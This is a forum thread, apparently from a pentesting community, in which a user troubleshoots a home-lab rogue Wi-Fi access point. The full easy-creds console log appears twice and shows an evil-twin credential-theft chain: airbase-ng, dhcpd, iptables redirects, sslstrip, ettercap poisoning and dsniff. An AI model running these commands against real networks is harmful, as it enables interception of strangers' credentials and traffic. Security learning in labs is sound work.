failed to connect FAKEAP

[ba8y]

Today, I  set up a fakeap home, But it confuses me.
When a mobile connect to the fakeap, it says "Network connection error. Try again ?" or "authentication error ".
What's the reason ?

[Lab]
Windows 7 + VirtualBox(Backtrack r3 x 86)

What I have done , E.x:

Code: [Select]

======================================================================================
easy-creds v3.6 11/08/2011
This script leverages tools for stealing credentials during a pen test.
*** At any time, ctrl+c to return to main menu ***

[+] Provide path for saving log files, ex. root, *NOT* /root/: /root/Desktop/

[+] Would you like to include a sidejacking attack? (y/n): n

[+] Network Interfaces:
eth0       xx:xx:xx:xx:xx:xx             IP:10.0.2.15



[+] Interface connected to the internet, example eth0: eth0

[*] airmon-ng
Interface    Chipset        Driver
wlan0        Ralink RT2870/3070    rt2800usb - [phy0]

[+] Wireless interface name, example wlan0: wlan0

[+] rogue AP ESSID, example FreeWiFi: Freeeeeeeee
[+] Channel, example 6 or 11: 6

[+] Monitor interface(s)
[*] airmon-ng | grep mon
 mon0        Ralink RT2870/3070    rt2800usb - [phy0]

[+] Enter monitor enabled interface name, example mon0: mon0
[*] ifconfig | grep Link| grep -v lo
eth0      Link encap:Ethernet  HWaddr xx:xx:xx:xx:xx:xx 
          inet6 addr: xxxx::xxx:xxxx:xxxx:xxx/xx Scope:Link
mon0      Link encap:UNSPEC  HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00 

[+] Enter tunnel interface, example at0: at0

[+] Do you have a populated dhcpd.conf file to use? (y/n) n
[+]Create dhcpd conf file: /etc/dhcp3/dhcpd-ec.conf
[+]Network range for your tunneled interface, example 10.0.0.0/24: 192.168.1.0/24
[+] Enter the IP address for the DNS server, example 8.8.8.8: 8.8.8.8


Creating a dhcpd.conf to assign addresses to clients that connect to us.
------/etc/dhcp3/dhcpd-ec.conf-----------
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.100 192.168.1.200;
    option domain-name-servers 8.8.8.8;
    option routers 192.168.1.1;
    option broadcast-address 192.168.1.255;
    default-lease-time 600;
    max-lease-time 7200;
}

[+] Launching Airbase with your settings.
[*] airbase-ng -P -e Freeeeeeeee -c 6 mon0 &

[+] Configuring dhcp tunneled interface.
[?] TUNIFACE: at0
[?] ATIP: 192.168.1.1
[?] ATSUB: 255.255.255.0
[?] ATNET: 192.168.1.0
[*] ifconfig at0 up
[*] ifconfig at0 192.168.1.1 netmask 255.255.255.0
[*] ifconfig at0 mtu 1400
[*] route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 dev at0

[+] Setting up iptables to handle traffic seen by the tunneled interface.
[*] iptables --flush
[*] iptables --table nat --flush
[*] iptables --delete-chain
[*] iptables --table nat --delete-chain
[*] iptables -P FORWARD ACCEPT
[*] iptables --append FORWARD --in-interface at0 -j ACCEPT
[*] iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
[*] iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

[+] Launching Tail.
[*] tail -f /var/log/messages &

[+] DHCP server starting on tunneled interface.
[*] dhcpd3 -q -cf /etc/dhcp3/dhcpd-ec.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

[*] ifconfig | grep Link| grep -v lo
at0       Link encap:Ethernet  HWaddr 7c:dd:90:42:94:55 
          inet6 addr: fe80::7edd:90ff:fe42:9455/64 Scope:Link
eth0      Link encap:Ethernet  HWaddr 08:00:27:c9:07:55 
          inet6 addr: fe80::a00:27ff:fec9:755/64 Scope:Link
mon0      Link encap:UNSPEC  HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00 

[+] Creating folder for attack output ...
[*] mkdir -p //root/Desktop//easy-creds-2014-01-05-0924

[+] Launching SSLStrip.
[*] python /pentest/web/sslstrip/sslstrip.py -pfk -w //root/Desktop//easy-creds-2014-01-05-0924/sslstrip2014-01-05-0925.log &

[+] Launching ettercap, poisoning specified hosts.
[*] ettercap -a /etc/etter.conf -T -q -l //root/Desktop//easy-creds-2014-01-05-0924/ettercap2014-01-05-0925 -i at0 // // &

[+] Configuring IP forwarding.
[*] echo 1 > /proc/sys/net/ipv4/ip_forward

[+] Launching URLSnarf.
[*] urlsnarf  -i at0&
Launching Dsniff.
[*] dsniff -m -i at0 -w //root/Desktop//easy-creds-2014-01-05-0924/dsniff2014-01-05-0925.log &

[^] Time to make it rain...  Enjoy!




[proxx]

Today, I  set up a fakeap home, But it confuses me.
When a mobile connect to the fakeap, it says "Network connection error. Try again ?" or "authentication error ".
What's the reason ?

[Lab]
Windows 7 + VirtualBox(Backtrack r3 x 86)

What I have done , E.x:

Code: [Select]

======================================================================================
easy-creds v3.6 11/08/2011
This script leverages tools for stealing credentials during a pen test.
*** At any time, ctrl+c to return to main menu ***

[+] Provide path for saving log files, ex. root, *NOT* /root/: /root/Desktop/

[+] Would you like to include a sidejacking attack? (y/n): n

[+] Network Interfaces:
eth0       xx:xx:xx:xx:xx:xx             IP:10.0.2.15



[+] Interface connected to the internet, example eth0: eth0

[*] airmon-ng
Interface    Chipset        Driver
wlan0        Ralink RT2870/3070    rt2800usb - [phy0]

[+] Wireless interface name, example wlan0: wlan0

[+] rogue AP ESSID, example FreeWiFi: Freeeeeeeee
[+] Channel, example 6 or 11: 6

[+] Monitor interface(s)
[*] airmon-ng | grep mon
 mon0        Ralink RT2870/3070    rt2800usb - [phy0]

[+] Enter monitor enabled interface name, example mon0: mon0
[*] ifconfig | grep Link| grep -v lo
eth0      Link encap:Ethernet  HWaddr xx:xx:xx:xx:xx:xx 
          inet6 addr: xxxx::xxx:xxxx:xxxx:xxx/xx Scope:Link
mon0      Link encap:UNSPEC  HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00 

[+] Enter tunnel interface, example at0: at0

[+] Do you have a populated dhcpd.conf file to use? (y/n) n
[+]Create dhcpd conf file: /etc/dhcp3/dhcpd-ec.conf
[+]Network range for your tunneled interface, example 10.0.0.0/24: 192.168.1.0/24
[+] Enter the IP address for the DNS server, example 8.8.8.8: 8.8.8.8


Creating a dhcpd.conf to assign addresses to clients that connect to us.
------/etc/dhcp3/dhcpd-ec.conf-----------
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.100 192.168.1.200;
    option domain-name-servers 8.8.8.8;
    option routers 192.168.1.1;
    option broadcast-address 192.168.1.255;
    default-lease-time 600;
    max-lease-time 7200;
}

[+] Launching Airbase with your settings.
[*] airbase-ng -P -e Freeeeeeeee -c 6 mon0 &

[+] Configuring dhcp tunneled interface.
[?] TUNIFACE: at0
[?] ATIP: 192.168.1.1
[?] ATSUB: 255.255.255.0
[?] ATNET: 192.168.1.0
[*] ifconfig at0 up
[*] ifconfig at0 192.168.1.1 netmask 255.255.255.0
[*] ifconfig at0 mtu 1400
[*] route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 dev at0

[+] Setting up iptables to handle traffic seen by the tunneled interface.
[*] iptables --flush
[*] iptables --table nat --flush
[*] iptables --delete-chain
[*] iptables --table nat --delete-chain
[*] iptables -P FORWARD ACCEPT
[*] iptables --append FORWARD --in-interface at0 -j ACCEPT
[*] iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
[*] iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

[+] Launching Tail.
[*] tail -f /var/log/messages &

[+] DHCP server starting on tunneled interface.
[*] dhcpd3 -q -cf /etc/dhcp3/dhcpd-ec.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 &

[*] ifconfig | grep Link| grep -v lo
at0       Link encap:Ethernet  HWaddr 7c:dd:90:42:94:55 
          inet6 addr: fe80::7edd:90ff:fe42:9455/64 Scope:Link
eth0      Link encap:Ethernet  HWaddr 08:00:27:c9:07:55 
          inet6 addr: fe80::a00:27ff:fec9:755/64 Scope:Link
mon0      Link encap:UNSPEC  HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00 

[+] Creating folder for attack output ...
[*] mkdir -p //root/Desktop//easy-creds-2014-01-05-0924

[+] Launching SSLStrip.
[*] python /pentest/web/sslstrip/sslstrip.py -pfk -w //root/Desktop//easy-creds-2014-01-05-0924/sslstrip2014-01-05-0925.log &

[+] Launching ettercap, poisoning specified hosts.
[*] ettercap -a /etc/etter.conf -T -q -l //root/Desktop//easy-creds-2014-01-05-0924/ettercap2014-01-05-0925 -i at0 // // &

[+] Configuring IP forwarding.
[*] echo 1 > /proc/sys/net/ipv4/ip_forward

[+] Launching URLSnarf.
[*] urlsnarf  -i at0&
Launching Dsniff.
[*] dsniff -m -i at0 -w //root/Desktop//easy-creds-2014-01-05-0924/dsniff2014-01-05-0925.log &

[^] Time to make it rain...  Enjoy!




Do you have any clue about the stuff in the script ?

[ba8y]

When USB WIFI driver is installed on windows 7, everything seems ok today.

But I kown that backtrack5(vbox) can read my USB card,  something like that:

• airmon-ng

Interface    Chipset        Driver
wlan0        Ralink RT2870/3070    rt2800usb - [phy0]

So funny !

[RedBullAddicted]

Hi,

are you sure about this one:

• Enter tunnel interface, example at0: at0

I have no clue about the script you are using. I made my own one a long time ago.. lol. Was basically one of my first contributions to ez. Search for eviltwin and you may find it here. It does not produce a lot of nice output but you should be able to go through the script and discover the required commands to setup everything you need. As soon as you understood the process in detail you will be able to help yourself

Cheers,
RBA

[noob]

I got sam problem long time ago,i was so frustraded becose i done it all right and still has same problem,sometimes its work sometimes did not.
So you must run backtrack from live CD or hard drive,this kind of attack cant always work in vmware,i see other people on internet confirming same problem!

[ba8y]

@RedBullAddicted

I'm sure that the tunnel interface is at0. E.x:

• ifconfig | grep Link| grep -v lo

at0    Link encap:Ethernet  HWaddr 7c:dd:90:42:94:55        --------->> * Attention Here *         
          inet6 addr: fe80::7edd:90ff:fe42:9455/64 Scope:Link
eth0      Link encap:Ethernet  HWaddr 08:00:27:c9:07:55 
          inet6 addr: fe80::a00:27ff:fec9:755/64 Scope:Link
mon0      Link encap:UNSPEC  HWaddr xx-xx-xx-42-94-55-30-30-00-00-00-00-00-00-00-00 

Maybe easy_creds is from yours.


@noob
What you've done is a good job for someone here. 


Thanks to everyone !

[Bareknuckle]

Try to learn how to do this manually instead of using automated scripts. It's much easier to figure out where a script is going wrong if you know what everything in the script means. As for manually setting up a fake AP, you have everything you need in the aircrack-ng suite, look into how to use the aircrack-ng suite, dhcpd, and ip tables and you'll be set!